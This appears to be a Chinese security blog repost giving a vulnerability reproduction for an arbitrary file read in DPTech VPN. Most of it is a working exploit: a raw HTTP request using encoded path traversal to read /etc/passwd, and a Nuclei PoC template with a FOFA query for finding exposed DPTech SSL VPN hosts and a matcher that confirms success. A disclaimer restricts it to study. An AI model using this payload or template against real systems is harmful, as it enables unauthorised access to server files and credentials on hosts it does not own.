「漏洞复现」DPTech VPN 存在任意文件读取

admin 2024年2月10日20:21:42评论16 views字数 1450阅读4分50秒阅读模式

免责声明

「漏洞复现」DPTech VPN 存在任意文件读取

此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任,与本文作者及发布平台无关。如有内容争议或侵权,请及时联系我们。谢谢!

「漏洞复现」DPTech VPN 存在任意文件读取

「漏洞复现」DPTech VPN 存在任意文件读取

漏洞概述

「漏洞复现」DPTech VPN 存在任意文件读取

      杭州迪普科技股份有限公司DPTech VPN 存在任意文件读取漏洞,攻击者可以构造恶意请求,通过漏洞读取服务器上的任意文件。这可能包括配置文件、敏感文档或其他敏感信息。成功利用此漏洞的攻击者可以获取系统敏感数据,可能导致横向扩展攻击、身份盗窃等风险。

「漏洞复现」DPTech VPN 存在任意文件读取

「漏洞复现」DPTech VPN 存在任意文件读取

漏洞复现

「漏洞复现」DPTech VPN 存在任意文件读取

GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1Host: Connection: keep-alivePragma: no-cacheCache-Control: no-cachesec-ch-ua: "Google Chrome";v="117", "Chromium";v="117", "Not=A?Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9

「漏洞复现」DPTech VPN 存在任意文件读取

「漏洞复现」DPTech VPN 存在任意文件读取

NUCLEI POC

「漏洞复现」DPTech VPN 存在任意文件读取

id: dptech-vpn-filereadinfo:  name: dp-vpn-fileread  author: rain  severity: high  description: DPtech SSL VPN 服务存在一个文件读取漏洞,攻击者可以通过利用此漏洞读取目标系统上的敏感文件。该漏洞可能导致未经授权的信息泄露,危及系统的机密性和完整性。  metadata:     fofa-query: title=="SSL VPN Service" && header="Dptech" || cert="DPtechCa"http:  - raw:      - |             GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36    matchers:      - type: dsl        dsl:          - 'status_code==200 && contains_all(body,"root")'

「漏洞复现」DPTech VPN 存在任意文件读取

「漏洞复现」DPTech VPN 存在任意文件读取

原文始发于微信公众号(知黑守白):「漏洞复现」DPTech VPN 存在任意文件读取

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月10日20:21:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   「漏洞复现」DPTech VPN 存在任意文件读取https://cn-sec.com/archives/2214347.html

发表评论

匿名网友 填写信息